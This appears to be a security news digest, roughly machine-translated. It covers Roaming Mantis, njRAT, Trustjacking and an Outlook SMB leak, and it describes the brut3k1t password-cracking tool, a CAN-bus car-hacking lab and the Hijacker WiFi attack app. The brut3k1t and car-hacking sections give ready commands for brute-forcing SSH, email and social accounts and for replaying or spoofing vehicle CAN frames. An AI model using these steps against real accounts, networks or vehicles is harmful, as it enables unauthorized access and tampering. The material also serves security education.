Recently, researchers unveiled a DNS hijacking campaign that was found to spread malware from banking Trojans to Android smartphone users mostly in Asia, which has now extended its reach to iOS and PC users.
Mantis Roaming malware now targets IOS devices for phishing attacks. A publication of Kaspersky Lab in April, gave details about the Mantis Roaming malware that performs targeted operations to hijack Android devices. The information security experts said that the malware is evolving and its objective is to capture confidential data of the user infecting.
“The landing pages and apk files now support 27 languages covering Europe and the Middle East, and malicious actors added an option for phishing to iOS devices and cryptography capabilities for PCs,” says Kaspersky’s Lab publication.
Now, you can perform various functionalities, as they are; the extraction of cryptocurrencies and the phishing of iOS devices; is also capable of targeting Android devices to steal information. Suguru Ishimaru, a Kaspersky Lab researcher, said the company also analyzed the previous Campaign Roaming Mantis and the findings were detailed in his blog.
It expanded to 27 different languages, including English, Hindi, Russian, Chinese and Hebrew. Initially, the malware was distributed in only five languages, but now the range is widened using an automatic translator, information security experts commented.
Experts explain that it was designed to be distributed through DNS hijacking, for now, this malware is more active in Asian regions, such as; Bangladesh, India, Japan and South Korea. Although, there are reports of the malware targeting devices in the Middle East and Europe.
According to information security experts, Roaming Mantis, works by redirecting victims to a malicious web page through the hijacking of DNS while the page is distributed through a fake Facebook or Chrome application (‘facebook.apk’ or ‘ chrome.apk ‘). This application contains an Android Trojan-Banker, and must be installed manually by the victim. The professionals also noted that the comments are published in simplified Chinese.
To hijack iOS devices, a page that mimics Apple’s official website that claims to be ‘security.app.com’ is distributed. Upon entering the page, you are required to provide user ID, passwords, CVV, card expiration and card number. This site supports 25 languages.
The information security researchers say that Roaming Mantis is able to steal private and confidential data from Apple and Android mobile phones, and that cryptocurrency mining is done in the inclusion of a script in the HTML source code of the malware, which runs every time open the browser.
A Coinhive Javascript miner runs to exploit the device’s CPU and extract the Monero cryptocurrency. The professionals also commented that the cryptocurrency mining of Mantis Roaming is quite subtle. Since most users may not realize that the resources of their device are being used.
So far, more than 150 successful attacks have been observed, but this could represent only a small fraction of the overall picture, since DNS hijacking is quite difficult to identify.
IBM recently banned all removable storage, throughout the company; this is a new policy that aims to avoid financial and reputational damage from a lost or misused USB drive.
Shamla Naidoo, IBM’s chief information security officer, told staff in an internal email that the company “is expanding the practice of banning the transfer of data to all portable removable storage devices such as USB, SD card and flash drive”.
Some areas already had this policy but, “in the coming weeks we are implementing this policy around the world,” said Naidoo.
This new policy has a simple and well-justified objective in a world full of data breaches: “the possible financial and reputational damage due to lost, lost or misused extractable portable storage devices should be minimized”, the CISO clarified.
A while ago, Stuxnet was written to “jump” from one terminal to another through USB drives that move between them as attack vectors. Only some of the networks they targeted were isolated, which means they had no direct access to the outside world. To prevent such an event on their networks, information security professionals recommend specialized USB devices to prevent malware from being configured on USB drives.
As an introduction, brut3k1t is a bruteforce module on the server side that supports dictionary attacks for various protocols, information security experts say.
Some of the current protocols that are complete and compatible are:
ssh
ftp
smtp
XMPP
instagram
Facebook
There will also be implementations of different protocols and services including Twitter, Facebook and Instagram.
The professionals tell us, that the installation is very simple. brut3k1t requires several dependencies, the program will install them if you do not have them.
argparse – used to analyze command line arguments
paramiko: used to work with SSH connections and authentication
ftplib: used to work with FTP connections and authentication
smtplib: used to work with SMTP connections (email) and authentication
fbchat – used to connect with Facebook
selenium: used to scrape the network, which is used with Instagram (and later with Twitter)
xmppy – utiized for XMPP connections .
The download is simple. git clone https://github.com/ex0dus-0x/brut3k1t
Change to directory:
cd /path/to/brut3k1t
We will talk about the use. Using brut3k1t is more complicated than just running a Python file, say information security professionals. By typing python brut3k1t -h it shows the help menu.
The researchers give us some examples of its use, cracking the SSH server running on 192.168.1.3 using root and wordlist.txt as a list of words.
python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt
The port will be automatically set to 22, if it is different, specify with -p indicator.
Cracking email test@gmail.com with wordlist.txt on port 25 with a delay of 3 seconds. For email, experts say that the SMTP server address should be used. As an example, Gmail = smtp.gmail.com. You can investigate this with Google.
python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w word list.txt -p 25 -d 3
Cracking XMPP test@creep.im with wordlist.txt on port 5222. XMPP is similar to SMTP, you must provide the XMPP server address, creep.im.
python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt
Cracking Facebook is more complicated, it will require the target user ID, not the username.
Instagram cracking with username test with wordlist.txt and 5 seconds delay
python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5
Here we will leave some notes to take into account. Use this article for educational purposes, as well as for the learning code and safety-oriented practices.
In the case where the port indicator -p is not provided, the default port for that service will be used. It is not necessary to provide it for Facebook and Instagram, says the information security researcher.
In the absence of the delay indicator -d, the default delay in seconds will be 1.
Experts say to use the SMTP server address and the XMPP server address for the address -a, for SMTP and XMPP, respectively.
Some protocols are not based on the default port. An FTP server may not be on port 21.
A team of information security experts tells us that sub-domain acquisition vulnerabilities happen whenever a subdomain points to a service (for example, GitHub pages, Heroku, etc.) that has been removed or removed. This may allow an attacker to configure a page in the service that was being used and direct his page to that subdomain. As an example, if subdomain.example.com was pointing to a GitHub page and the user decided to remove their GitHub page, an attacker could create a GitHub page, add a CNAME file that contains the subdomain.testing. com and claim the subdomain.testing. com.
A subdomain that points to a GitHub page is www. testing. com. If someone decides to remove https:// github. com/test0x01/testing and does not delete the DNS entry that points to this page, you can post content at www. testing. com.
Some hackers use sub-domain and brute force scraping tools such as Sublist3r to find the sub-domains of a target, say information security professionals. Then the DNS records will be verified and / or a screen capture script will be used to detect vulnerable subdomains. A subdomain that points to a GitHub page that returns a 404 can be an indicator that can be claimed on GitHub.
Now we will talk about Sublist3r. It is important to know that Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. Information security researchers tell us that it also helps penetration verifiers and bug hunters collect sub-domains for the domain they point to. In addition, Sublist3r lists subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. On the other hand, it enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS.
Experts comment that subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved word list.
About the security impact; a subdomain control takeover could allow an attacker to publish content in the subdomain, information security experts said. In the case where a subdomain is a secondary domain of the base name of the service, the attacker can also read and set cookies in the base name: subdomain.example.com can set cookies for example.com.
We have a real case of a subdomain acquisition made by Frans Rosén on inside.gratipay.com. Researchers tell us that, Frans posted a page on a hidden route (login123) instead of posting content on the landing page. This is the best way to avoid damaging the image of the company.
It is important to remove the DNS entry in the subdomain that points to the deleted service to make sure no one can take over.
First we will see the topics that will be covered by the information security experts in this test / course of auto hacking: Configuration of virtual environments for tests, Sniffing CAN Traffic, Analyzing CAN Traffic, Inverse Engineering CAN IDs, Denial of service attacks, Reproduction / Traffic injection, Coding your own tools CAN Socket in python, Attacks directed against the components of your car and Transitioning this to attack a real car with hardware.
Before going into specific details of vehicle hacking, we will explain what CAN is; is to start your laboratory. In this occasion we are going to run a simple simulated CAN Bus network that controls several features of your simulated car. Experts always tell us that it is better to learn by doing than sitting down and saying a lot of network terms.
For this project you are not expected to buy too much hardware and jack in your real car immediately. Instead, there are options that can start hacking cars following this tutorial.
To begin with, information security researchers say you need to configure yourself with an Ubuntu VMware installation and load it. Optionally, you could also use VM Kali Linux, however, you may have copy problems and it is believed that Kayak was giving installation problems. It is also known that Kali works well with the virtual OpenGarages car.
Install PreReq libraries: Once loaded, you will install the CAN utilities and prerequisite libraries. This is really easy to do with the following Apt-get commands:
Start the simulator: now we can start the simulator by changing the directories to the downloaded repository and executing the following 2 commands, which will configure a virtual CAN interface and a simulator GUI cluster:
Run the configuration script to get the vcan0 interface:
root @ kali: ~ / ICSim # ./setup_vcan.sh
root @ kali: ~ / ICSim # ./icsim vcan0
In a new terminal tab, open the simulator controller with the following command:
root @ kali: ~ / ICSim #. / controls vcan0
Professionals comment that the controller should be the GUI screen in focus to send keyboard commands to the simulator.
To use the simulator; experts in information security tell us that the simulator has a speedometer with turn signals to the right and left, doors, etc. There is a list of commands to control the simulator when the control panel is focused.
The up and down keys control the speedometer of the meter groups
Left and right keys Controls the flashing lights
Shift right + X, A or B open doors
Left shift + X, A or closed doors
Experiment with some of the previous commands, for example, Shift + X, you can see that the interface changes.
Now you have your own car to hack. It is important to note that in the configuration commands above we use a VCan0 interface. Run Ifconfig and you will see that it has a new network interface that speaks to the CAN network through VCan0.
Researchers comment that the networks of cars are executed in a variety of more common protocols that are CAN. You can think of a CAN Bus as a network center where everyone can see the traffic of the whole world. This is true up to a point, although you may not see all the traffic if you are not connected to that particular bus. You can think of a type of CAN traffic similar to the UDP in which it is sent and forgotten, the main difference is that the parts of the CAN bus network do not really have addresses and everything is executed with IDs and arbitration priorities.
Now, let’s check if you can see our CAN traffic from our virtual car through the CanDump utility, which you installed as part of the previous CanUtils package. Using the following command in the vcan0 interface that our simulator uses, you can see a traffic sequence:
Now we can see CAN frames, and if we perform actions on the vehicle, we will see changes in the data values in the CanDump output. However, experts say that this can happen very quickly and we may not be able to see if we have unlocked the door of our simulators. This happens because things change constantly in the idle state of cars.
To capture and play CAN actions; an option would be to perform an action and reproduce it, you should see that the actions happen again in the repetition if the traffic for the action that we recorded is in the same bus network in which our device is connected. There are a lot of networks inside a car and our network tap is not guaranteed, an OBD2 port connector is connected to the same network as the door we open.
Another useful tool included with the CanUtils package is CanPlayer to reproduce traffic, say information security experts. If the functionality we are trying to capture is in the same Bus as the adapter connected to the car, or in this case our Virtual CAN interface, we can use CanDump to save the traffic in a file. Then we use CanPlayer to reproduce the traffic on the network. An example, run CanDump, opens a door and then replays the functionality with CanPlayer.
Lab 1 steps:
Run CanDump
Right Shift + X to open a door
Cancel CanDump (ctrl + c)
Left Shift + X to close the door
Run can the player with the dump saved and will replay the traffic and open the door
Record of the opening of the door: (-l for the record)
At this point you should see that your door is open again. CAN networks are not like TCP / IP, they are more like UDP in that you send your request and do not expect a response. Then, it is lost and you have to send again. It is likely that you were sending something with higher priority on the network at the time of its reproduction and your traffic was overshadowed by it.
Interacting with Can Bus and Reversing Traffic; this is good, but, CanDump is not very useful for this, it moves quickly so we can learn a lot from. Instead, we can use CanSniffer with colored output to show us the bytes inside the packets that change.
Now you will see Time, ID and Data. The most important part for our use is the ID and Data fields.
The frame ID is associated with the device in the network that is made by the box that is sent. Identification also determines the priority of the framework in the network. The smaller the CAN-ID number, the higher priority it will have on the network and the more likely it will be to handle it first. The data field is the information that is sent to change some parameter, such as unlocking a door or updating the output. The values in red are the values that are changing during the inactive state in which you are currently.
Determine which ID and Byte control the accelerator; with the sniff window of the terminal open, put the simulator and controller in the foreground, with the controller as the window in which you clicked and selected. Pay attention to the CanSniffer output while pressing the UP ARROW and look for a value that is white but is now red and increases in value as the accelerator goes up, say information security researchers.
Select values with filters; to select the accelerator value, click on the terminal window and press -000000 followed by the Enter key that will erase all the values that are displaced. Then press +244 followed by the Enter key, which will add the accelerator identification again. Now you can click on the controller again and increase the speed with the up arrow button without all the noise obscuring your view. Instead, as shown below, you will only have ID 244 in your result.
To retrieve the IDs again, click on the terminal window and enter +000000 followed by the Enter key. Now you should see the entire exit as before. Essentially 000000 means to include everything. When you put a minus sign in front of it, it denies everything and clears your terminal window by filtering all the values.
Determine the Blinker ID; discover identification for the flashing lights. If you press the left or right arrow with the selected control window, you will see a completely new ID appear in the list, ID 188 shown in the following image, which is associated with the flashing light.
This ID was not mentioned, since it was not used in data output until you pressed the flashing light control. Let’s drop this value by pressing -000000 followed by +188. As in the example of the accelerator, your terminal should only show ID 188; initially it will be shown with values of 00 bytes.
Pressing the left and right flashing light, you can see the first change of Byte from 00 to 01 or 02. If none of them is pressed, it will be 00. The identification will remain visible as 00 until the time expires and disappears from the list when it is not active.
It’s time to do some protocol inversion. This lab will give you an idea of how to reverse all the functionality of the car and associate each action with the correct ID and BYTE. In this way, you can create a map of the desired functionality changes. We have already done some steps on how to determine which byte and ID are associated with an action. Now it’s time to map with all the remaining functions before moving on to attack individual components.
Attacking the functionality, with all the assigned functionality, we can now address several devices on the network directly without interacting with the GUI of the controllers. Perhaps we entered the car through the OnStar cellular connection or the central console units of the BLE connection that was connected to the CAN network in some way.
After an exploit we have direct access to the CAN network and we would like to take actions. Or maybe you have installed a wireless device in an OBD2 port under the board.
Using data from the CAN network reversal lab, we can call these actions directly with the appropriate CAN-ID and byte. Since we are far from the goal, we cannot simply reach out and grab the steering wheel or squeeze the accelerator; instead, we will send your CAN structure to make the change.
One way we can do this is through the CanSend utility, say information security researchers. Take the information from our laboratory above and make the left turn signal flash with the next ID 188 for the turn signal by changing the first byte to 01, which indicates that the left signal is pressed. CanSend uses the ID # Data format.
Now you should have noticed that the left signal flashed. If this did not happen, try again or make sure you have used the correct ID and changed the correct byte. This will do the same with the accelerator and try to adjust the speed to something with ID 244 that we determined was the accelerator.
Now you may notice that the needle jumps back and forth a little. The needle bounces back and forth because normal CAN traffic is sent telling the car that it is actually set to 00 between its frames, which means it is 30 mph. Now the speed of the car has changed and the flashing light has been turned on without using the normal turn signal controls.
One way to handle this problem is to monitor the CAN network and when you see a sent ID, it will automatically send the corresponding ID with a different value. At this point we will try to modify the speed output by monitoring the changes. Next, we simply run CanDump and analyze the ID 244 in the record output, which is the value of the accelerator that tells the car the speed. When a device in the car reports ID 244 and its value, we will immediately send our own value saying that the speed is 30 mph with the value 11, said information security researchers.
With this operation after a few seconds you will see that the speed is adjusted to around 30 MPH once you capture a legitimate CAN-ID 244 network traffic and send your own value immediately afterwards.
While the previous command is still working, click on the controller window and start holding the arrow up with the controller in focus. After waiting a few seconds, when the speed exceeds 30 MPH you will see the needle fighting for the highest real value and adjust back to 30 MPH as your command continues to send its value as a replacement for the actual speed.
This is a way to monitor the network and react in a very crude way to what you see. Maybe someone stole your car and you want to control if there is an open door and if they try to open the door, it immediately locks them up
To begin with, the experts explain that Hijacker is a graphical user interface for the penetration test tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. This application offers a simple and easy user interface to use the tools without writing commands in a console and copying and pasting MAC addresses.
The information security professionals comment that this application requires an Android ARM device with an internal wireless adapter that supports the monitor mode. Some Android devices can do it, but none of them natively. This means that you will need a custom firmware. A device using the BCM4339 chip set (MSM8974, such as Nexus 5, Xperia Z1 / Z2, LG G2, LG G Flex, Samsung Galaxy Note 3) will work with Nexmon. Also devices that use BCM4330 can use bcmon.
An alternative that the experts give is to use an external adapter that supports the monitor mode in Android with an OTG cable.
The necessary tools are included for the armv7l and aarch64 devices as of version 1.1. The Nexmon driver and the administration utility for BCM4339 and BCM4358 are included.
Information security researchers say that root access is also necessary, since these tools need a root to function.
Characteristics
Information gathering
See a list of access points and stations (customers) around you, including hidden ones
View the activity of a specific network measuring beacons and data packets, and their clients
Statistics on access points and stations
Consult the manufacturer of a device from the OUI database
See the signal strength of the devices and filter the ones that are closest to you
Save the captured packets in the .cap file
Attacks
Disabling all clients of a network, either for each of them or without a specific objective
Disabling a specific client from the network to which you are connected
MDK3 Beacon Flooding with custom options and SSID list
MDK3 Authentication DoS for a specific network or for each nearby AP
Capture a WPA handshake or join IV to break a WEP network
Reaver WPS cracking
Other
Leave the application running in the background, optionally with a notification
Copy commands or MAC addresses to the clipboard
Includes the necessary tools, without the need for manual installation
Includes the Nexmon driver, required library and administration utility for devices BCM4339 and BCM4358
Set commands to enable and disable the monitor mode automatically
Crack .cap files with a custom word list
Create custom actions and easily execute them at an access point or client
Sort and filter access points and stations with many parameters
Export all collected information to a file
Add a persistent alias to a device for easier identification
For the installation, experts comment that you must ensure that:
you are on Android 5+
is rooted, SuperSU is required, if it is in CM / LineageOS install SuperSU
you have a firmware to support monitor mode on your wireless interface
Whenever you run Hijacker for the first time, you will be asked if you want to install the Nexmon firmware or go to the start screen. If you have installed your firmware or use an external adapter, you can go to the home screen. Otherwise, and if your device is compatible, click on ‘Install Nexmon’ and then ‘Install’. Then, you will land on the home screen and airodump will start. Information security professionals say you should make sure you have enabled your WiFi and it is in monitor mode.
It is also important to know that on some devices, changing the files in / system could trigger an Android security feature and the partition of your system will be restored when you reboot the system.
For the problems solution. This application is designed and tested for ARM devices. All the included binaries are compiled for that architecture and will not work on anything else. You can check if your device is compatible in Settings: if you have the option to install Nexmon, then you are in the correct architecture, otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, library libfakeioctl.so) in an accessible PATH directory and set the option ‘Prefix’ for the tools to preload the library they need: LD_PRELOAD = / path / to / libfakeioctl.so.
In configuration, you will find an option to test the tools. If something fails, you can click on ‘Copy test command’ and select the tool that fails. This will copy a test command to your clipboard, which you can manually run in a root shell and see what is wrong. In the case where all the tests pass and you still have a problem, do not hesitate to open a problem here to solve it, or use the option “Send comments” in the configuration of the application.
If the application should fail, a new activity will be started that will generate an error report in your external storage and give you the option to send it by email. The report is displayed in the activity so you can see exactly what will be sent, say information security researchers.
Keep in mind that Hijacker is just a GUI for these tools. The way you run the tools is pretty simple, and if all the tests happen and you’re in monitor mode, you should get the results you want. Information security professionals tell us to also keep in mind that these are audit tools. This means that they are used to test the integrity of your network, so there is a possibility that attacks will not work on your network. This is not the fault of the application; it is really something to be happy about.
Symantec professionals have found a vulnerability that could allow hackers to compromise iOS devices without the owner’s knowledge.
This iOS attack named as “Trustjacking” by information security researchers exploits a vulnerability in iTunes Wi-Fi Sync, a special feature that allows iOS devices to synchronize with iTunes without having to physically connect the device. This feature can be enabled by physically connecting an iOS device to a computer, specifying that the iOS device can trust the computer, and then enable iTunes Wi-Fi Sync from the PC. Once a reliable Wi-Fi Sync connection is established, the hacker could have access to the user’s computer; the hacker could secretly spy on the iOS device or record and control any type of activities remotely.
“With this the computer could access the photos on the device, make a backup, and install applications and much more, without requiring another confirmation by the user and without any noticeable indication. It also allows activating the function “iTunes Wi-Fi synchronization”, which allows continuing this type of communication with the device even after it has been disconnected from the computer, provided that the computer and the iOS device are connected to the same network. It is important to mention that enabling “iTunes Wi-Fi synchronization” does not require the approval of the victim and can be carried out purely from the side of the computer, “wrote Roy Iarchy, head of research at Modern OS Security.
Adi Sahabani, senior vice president of modern security for the operating system at Symantec, said it is “extremely shocking.” Adi was the one who revealed the findings at RSAC 2018 last Wednesday along with his colleague Iarchy.
The report states that once the malicious computer is authorized, there is no means to prevent continued access to the device. The information security expert said that users do not receive any message or notification when authorizing the computer; they allow access to their device even after disconnecting the USB cable.
“Even if the device is only connected for a very short time, it may be enough for an attacker to maintain visibility of all actions performed on the device after disconnecting it,” Iarchy wrote. The professionals revealed the vulnerability to Apple, which addressed the problem by adding an additional layer of protection in iOS 11. The new layer requires the iOS user to enter their password when they trust a computer. However, information security researchers believe that such measures are inadequate.
“The user is told that this authorization is only relevant while the device is connected to the computer, this makes the user believe that unplugging his device guarantees that nobody can access his private data,” Iarchy writes in a publication. “While we appreciate the mitigation that Apple has taken, we would like to emphasize that it does not address Trustjacking in a holistic way. Once the user has chosen to trust the compromised computer, the rest of the exploit continues to work. ”
Information security analysts suggest that users enable encrypted backups in iTunes and select a secure password to protect their devices. The users should also go to Settings> General> Reset> Reset location and privacy, and reauthorize previously connected computers.
JSHielder is an Open Source tool developed to help SysAdmin and developers secure their Linux Servers in which they will be deploying any web application or services. According to information security experts this tool automates the process of installing all the necessary packages to host a web application and Hardening a Linux server with little interaction from the user. Newly added script follows CIS Benchmark Guidance to establish a secure configuration posture for Linux systems.
This tool is a Bash Script that hardens the Linux Server security automatically and the steps followed are:
Configures a Hostname
Reconfigures the Timezone
Updates the entire System
Creates a New Admin user so you can manage your server safely without the need of doing remote connections with root.
Helps user Generate Secure RSA Keys, so that remote access to your server is done exclusive from your local pc and no Conventional password
Configures, Optimize and secures the SSH Server (Some Settings Following CIS Benchmark Ubuntu 16.04)
Configures IPTABLES Rules to protect the server from common attacks
Protects the server against Brute Force attacks by installing a configuring fail2ban
Stop Portscans by blocking intrusive IP via IPTABLES using portsentry
Install, configure, and optimize MySQL
Install the Apache Web Server
Install, configure and secure PHP
Secure Apache via configuration file and with installation of the Modules ModSecurity, ModEvasive, Qos and SpamHaus
Installs RootKit Hunter
Secures Root Home and Grub Configuration Files
Installs Unhide to help Detect Malicious Hidden Processes
Installs Tiger, A Security Auditing and Intrusion Prevention system
Restrict Access to Apache Config Files
Disable Compilers
Creates Daily Cron job for System Updates
Kernel Hardening via sysctl configuration File (Tweaked)
Other Hardening Steps
Added PHP Suhosin Installation to protect PHP Code and Core for Known and Unknown flaws (Removed on Ubuntu 16. 04)
Use of Function for code execution customization
Distro Selection Menu
Function Selection Menu
Deployment Selection Menu (LAMP, LEMP, Reverse Proxy)
Added LEMP Deployment with ModSecurity
Added /tmp folder Hardening
Added PSAD IDS installation
Added Process Accounting
Added Unattended Upgrades
Added MOTD and Banners for Unauthorized access
Disable USB Support for Improved Security (Optional)
Restrictive Default UMASK
Added Additional Hardening Steps
Auditd install
Sysstat install
ArpWatch install
Hardening steps following CIS Benchmark
Secures Cron
Disables Unused Filesystems and Uncommon Network protocols
Configure Auditd rules following CIS benchmark (Ubuntu 16. 04)
Automates the process of setting a GRUB Bootloader Password
Secures Boot Settings
Sets Secure File Permissions for Critical System Files
New function
Separate Hardening Script Following CIS Benchmark Guidance https://www.cisecurity.org/benchmark/ubuntu_linux/ (Ubuntu 16. 04)
To run the tool
./jshielder.sh
As the Root user
Having Problems, please open a New Issue for JShielder on Github.
Distro Availability
Ubuntu Server 14. 04LTS
Ubuntu Server 16. 04LTS
After final release of Ubuntu 18. 04LTS, will not be maintaining Jshielder for Ubuntu 14. 04, information security researchers said. It will focus on last 2 major LTS Releases.
Most people rely on Outlook email address for work-related as well as personal tasks. Unfortunately, Outlook may not be as secure as we users would like to think. According to a report published by information security training experts at the Carnegie Mellon Software Engineering Institute, Outlook comes with a security bug that could trigger password hash leaks when users’ preview Rich Text Format emails that contains remotely hosted OLE objects.
This security vulnerability exists because the Redmond giant doesn’t use strict content verification and restrictions when loading items from a remote SMB server. On the other hand, the same vulnerability cannot be exploited when accessing web-hosted content as Microsoft applies much stricter restrictions when dealing with this type of content.
Outlook doesn’t load web-hosted images in emails in order to protect users’ IP addresses. However, when users access RTF email messages that contain OLE objects loaded from a remote SMB server, Outlook does load the respective images.
This leads to a series of leaks that include IP address, domain name, and more as the reports explains:
Outlook blocks remote web content due to the privacy risk of web bugs. But with a rich text email, the OLE object is loaded with no user interaction… Here we can see than an SMB connection is being automatically negotiated. The only action that triggers this negotiation is Outlook previewing an email that is sent to it… I can see that the following things are being leaked: IP address, domain name, user name, host name, SMB session key. A remote OLE object in a rich text email messages functions like a web bug on steroids.
Microsoft partially fixes the problem. Microsoft recently rolled out a hotfix on Patch Tuesday to fix this security issue. According to information security training experts, this solution is not 100% safe as it fails to block all remote SMB attacks.
Once this fix is installed, previewed email messages will no longer automatically connect to remote SMB servers. This fix helps to prevent the attacks outlined above. It is important to realize that even with this patch, a user is still a single click away from falling victim to the types of attacks described above. For example, if an email message has a UNC-style link that begins with “\\”, clicking the link initiates an SMB connection to the specified server.
The njRAT, also famed as Bladabindi, has been upgraded to push Lime Ransomware and a Bitcoin wallet stealer. According to a Zscaler blog post, this trojan was first spotted in 2013 and has remained one of the most prevalent malware families using multiple .NET obfuscation tools that make detection difficult for antivirus solutions and that hinder analysis by information security training researchers.
The malware was developed using the Microsoft .NET framework and uses multiple .NET obfuscation tools to make detection difficult for antivirus solutions and that hinder analysis by security researchers.
The malware also uses dynamic DNS for command-and-control (C2) servers and communicates using a custom TCP protocol over a configurable port the blog said.
Deepen Desai, Zscaler’s senior director for information security training research and operations told the source of the malware is unclear, but that researchers know the payload is being served from a server in Australia that is hosting a compromised site.
Seventy percent of the users affected were in South America, while the remaining 30 percent were in North America. The new RAT variant added ransomware and Bitcoin wallet stealing features which appear to contradict each other in practice.
“This is an interesting development, especially the ransomware feature, given that RATs by nature operate in stealth,” Desai said. “Ransomware on the other hand will reveal the infection.”
The information security training professional added the, author is taking a shortcut by stealing existing wallets, but it said he wouldn’t be surprised if the author also adds support for mining Bitcoin on the compromised system in a future variants.
The njRAT variant has the capability of performing ARME and Slowloris DDoS attacks.
The information security training experts described Slowloris as an attack tool designed to allow a single machine to take down a server with minimal bandwidth, send multiple partial HTTP requests, and to keep many connections to the target web server open and hold them open as long as possible.
“The malware also has a WORM functionality to spread through USB that enumerates the files and folders on the hard drive,” analysts said in the post. “Once it detects the USB drive inserted into the system, it copies itself to the USB drive and creates a shortcut using the folder icon.”
As per recommendation of the information security training professionals, the best way to prevent infection is for a user to follow standard security best practices when handling e-mails from external sources as the malware is known to be spread via malicious email links.
WebImprints - Data Security Company 